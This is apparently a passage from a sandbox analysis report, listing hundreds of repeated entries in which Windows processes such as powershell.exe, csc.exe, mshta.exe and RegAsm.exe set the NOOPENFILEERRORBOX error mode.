                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
